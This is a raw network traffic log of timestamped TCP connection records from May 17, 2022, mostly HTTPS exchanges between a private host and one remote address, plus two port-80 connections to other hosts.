                                                                                                                                                                                        May 17, 2022 13:31:41.307593107 CEST49848443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.308201075 CEST44349848142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.308279037 CEST49848443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.308444023 CEST44349848142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.308518887 CEST44349848142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.308551073 CEST49848443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.308578968 CEST49848443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.309170961 CEST49848443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.309189081 CEST44349848142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.320226908 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.320269108 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.320344925 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.320911884 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.320926905 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.364062071 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.364214897 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.369499922 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.369524002 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.373914003 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.373934031 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.451651096 CEST44349849142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.451747894 CEST44349849142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.451960087 CEST49849443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.451987982 CEST44349849142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.451998949 CEST49849443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.453289032 CEST44349849142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.453350067 CEST49849443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.454440117 CEST49849443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.470863104 CEST49849443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.470901966 CEST44349849142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.473608971 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.473649025 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.473841906 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.474822044 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.474850893 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.520339966 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.520888090 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.520909071 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.520922899 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.527292967 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.527326107 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.542596102 CEST4976480192.168.2.3171.8.167.89
                                                                                                                                                                                        May 17, 2022 13:31:41.583471060 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.583528042 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.583592892 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.583617926 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.583659887 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.583717108 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.583890915 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.583970070 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.583976984 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.583998919 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.584063053 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.584120989 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.587179899 CEST49850443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.587204933 CEST44349850142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.596245050 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.596297026 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.596381903 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.599843979 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.599858999 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.647083998 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.647254944 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.647816896 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.647850990 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.666907072 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.666937113 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.702274084 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.702341080 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.702454090 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.702471972 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.702924013 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.703927040 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.704005957 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.704046011 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.704066038 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.737776995 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.737833023 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.737885952 CEST49851443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.737916946 CEST44349851142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.737931013 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.738725901 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.738750935 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.784385920 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.784544945 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.802828074 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.802853107 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.806432009 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.806454897 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.835655928 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.835721970 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.835962057 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.835990906 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.836086988 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.836780071 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.836849928 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.836852074 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.836896896 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.838048935 CEST49852443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.838082075 CEST44349852142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.839668036 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.839705944 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.839776039 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.840558052 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.840578079 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.886208057 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.886317968 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.888467073 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.888504028 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.893254995 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.893276930 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.953666925 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.953744888 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.953779936 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.953798056 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.953815937 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.953870058 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.954612017 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.954698086 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.954730034 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.954771042 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.955842018 CEST49853443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.955868006 CEST44349853142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.957494974 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.957549095 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:41.957673073 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.958571911 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:41.958600998 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.007754087 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.007939100 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.008539915 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.008562088 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.027731895 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.027754068 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.087706089 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.087758064 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.087836027 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.087857962 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.087917089 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.089061975 CEST49854443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.089078903 CEST44349854142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.090903044 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.090944052 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.091020107 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.092057943 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.092088938 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.145031929 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.145200968 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.150736094 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.150759935 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.156793118 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.156816006 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.181257010 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.181310892 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.181365967 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.181386948 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.181395054 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.181432962 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.185036898 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.185183048 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.185236931 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.185276985 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.185379982 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.185395956 CEST44349855142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.185417891 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.185436964 CEST49855443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.186764956 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.186816931 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.186903954 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.188076019 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.188098907 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.240277052 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.240422964 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.241055012 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.241071939 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.259562016 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.259588003 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322072029 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322156906 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322210073 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.322246075 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322263956 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.322304964 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.322494984 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322551966 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.322567940 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322588921 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.322623014 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.322658062 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.326196909 CEST49856443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.326231956 CEST44349856142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.327759027 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.327799082 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.328032970 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.328795910 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.328819036 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.358141899 CEST4985980192.168.2.3180.163.251.231
                                                                                                                                                                                        May 17, 2022 13:31:42.382687092 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.382776976 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.384387016 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.384408951 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.390559912 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.390594959 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.460639000 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.460691929 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.460800886 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.460802078 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.460936069 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.460941076 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.462408066 CEST49857443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.462443113 CEST44349857142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.464087009 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.464128971 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.464210033 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.464935064 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.464953899 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.515439034 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.515543938 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.516526937 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.516542912 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.522013903 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.522028923 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.554322004 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.554404020 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.554461956 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.554488897 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.554507017 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.554572105 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.555269957 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.555361032 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.555361986 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.555416107 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.568586111 CEST49858443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.568624973 CEST44349858142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.579302073 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.579344988 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.579456091 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.610102892 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.610130072 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.661098957 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.661179066 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.661786079 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.661798000 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.666836977 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.666857004 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.685669899 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.685750008 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.685831070 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.685849905 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.685866117 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.685899019 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.687108994 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.687197924 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.687220097 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.687252045 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.692497015 CEST49860443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.692538977 CEST44349860142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.696685076 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.696742058 CEST44349863142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.696831942 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.738676071 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.738707066 CEST44349863142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.787611008 CEST44349863142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.787730932 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.818120003 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.818146944 CEST44349863142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.838496923 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.838577986 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.838594913 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.838613033 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.838624001 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.838668108 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.838675976 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.838723898 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.840122938 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.840224028 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.840275049 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.840527058 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.841342926 CEST49863443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.841365099 CEST44349863142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.846374035 CEST49861443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.846400976 CEST44349861142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.849251032 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.849282026 CEST44349864142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.849370003 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.850605965 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.850626945 CEST44349864142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.895807028 CEST44349864142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.895900965 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.898468018 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.898495913 CEST44349864142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.904634953 CEST49864443192.168.2.3142.250.186.46
                                                                                                                                                                                        May 17, 2022 13:31:42.904661894 CEST44349864142.250.186.46192.168.2.3
                                                                                                                                                                                        May 17, 2022 13:31:42.994898081 CEST44349863142.250.186.46192.168.2.3
